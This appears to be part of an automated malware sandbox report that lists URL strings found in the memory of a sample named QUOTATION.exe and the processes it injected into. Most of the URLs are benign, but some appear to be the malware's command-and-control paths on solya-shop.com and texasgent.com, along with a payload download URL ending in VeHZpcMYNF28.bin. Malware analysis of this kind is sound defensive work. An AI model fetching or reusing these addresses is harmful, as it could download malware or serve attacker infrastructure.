Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8016192740.000000000AF24000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.solya-shop.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8016192740.000000000AF24000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.solya-shop.com/d91r/
Source: explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.solya-shop.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.solya-shop.comwww.buymyenergy.com
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texasgent.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texasgent.com/d91r/
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texasgent.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000002.8041134967.000000001594E000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000540E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.texasgent.com/d91r/?8H7gL=Bxcfm_qbbEGm&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhd
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.texasgent.comwww.brightfms.com
Source: QUOTATION.exe, 00000008.00000001.3526150899.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: QUOTATION.exe, 00000008.00000001.3526150899.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.www.fantasticserver.yachts
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppat
Source: explorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppb
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
Source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: explorer.exe, 00000009.00000000.4210981043.0000000009806000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8011713665.0000000009806000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000009.00000003.4747873788.000000000D3F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6122981294.000000000D3F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D3F5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000000.4217880966.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000D0A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.4217880966.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000D0A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/a
Source: explorer.exe, 00000009.00000003.6310377593.0000000009753000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000002.8009354628.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6310377593.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6123718142.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.00000000096DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000009.00000000.4217880966.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6463260519.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4743238865.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6120364620.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8026780659.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6283225298.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.4210981043.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8011713665.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4744694166.0000000009900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000009.00000002.8041134967.0000000015174000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004C34000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: QUOTATION.exe, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: QUOTATION.exe, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: QUOTATION.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: explorer.exe, 00000009.00000003.4747263289.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.00000000106FF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000009.00000000.4217880966.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr, System.dll.2.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?c5f848a241986c827a6aea67b151df57
Source: explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://js.users.51.la/21113239.js
Source: help.exe, 0000000A.00000002.7996001567.0000000003633000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: help.exe, 0000000A.00000002.7996001567.0000000003633000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: help.exe, 0000000A.00000002.7996001567.0000000003633000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr	String found in binary or memory: https://mozilla.org0
Source: explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000009.00000000.4210981043.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8011713665.00000000098CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000009.00000000.4217880966.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CF19000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comM
Source: explorer.exe, 00000009.00000002.8041134967.0000000014B2C000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000045EC000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://solya-shop.com/d91r/?pO=7PV8upFW6FVa3k/MU
Source: help.exe, 0000000A.00000002.8008447168.0000000007D80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000009.00000002.8021127369.000000000D39C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D39C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D39C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com(
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4930128227.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4198190622.0000000000E1C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4929197336.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6309253673.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6302354040.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6315302527.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6278355479.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8032472066.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6289509147.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4227133782.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6456705172.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/new
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_domains_btn&
Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/action_constructor.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=sh
Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/domains/check?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/help/faq?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_faq&
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/hosting?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_hosti
Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/scripts/shop_window.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=s
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl&wn_ca
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl2&wn_c
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banne
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/wn/img/email/logo-bottom.png
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru/wn/img/logo-horizontal.svg
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.webnames.ru?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_logo&wn_campa
Source: QUOTATION.exe, 00000008.00000003.4189935994.0000000003470000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.0000000003473000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4188808351.0000000003470000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.3934592654.0000000003470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wittofitentertainment.com/
Source: QUOTATION.exe, 00000008.00000002.4313926438.000000000345B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wittofitentertainment.com/VeHZpcMYNF28.bin
Source: QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wittofitentertainment.com/VeHZpcMYNF28.bin(
